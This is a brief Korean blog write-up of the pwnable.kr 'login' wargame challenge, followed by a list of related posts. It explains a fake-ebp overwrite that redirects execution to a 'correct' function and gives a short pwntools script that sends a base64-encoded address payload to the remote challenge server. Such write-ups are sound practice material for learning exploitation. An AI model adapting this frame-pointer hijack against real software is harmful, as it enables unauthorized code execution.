hash 충돌쌍을 찾는 것 같지는 않았고 디버깅을 해보니 ebp를 덮을 수 있다. fake ebp를 이용하여 correct 함수로 eip를 조작할 수 있다.
Exploit Code
from pwn import *
#p=process('./login')
p=remote('pwnable.kr', 9003)
payload = p32(0xdeadbeef)+p32(0x804925f)+p32(0x811eb40)
payload = payload.encode('base64')
p.sendline(payload)
p.interactive()Capture the Flag
'Writeup [pwn] > pwnable.kr' 카테고리의 다른 글
| note (0) | 2020.03.08 |
|---|---|
| loveletter (0) | 2020.03.08 |
| rsa calculator (0) | 2020.03.07 |
| md5 calculator (0) | 2020.03.07 |
| fsb (0) | 2020.03.07 |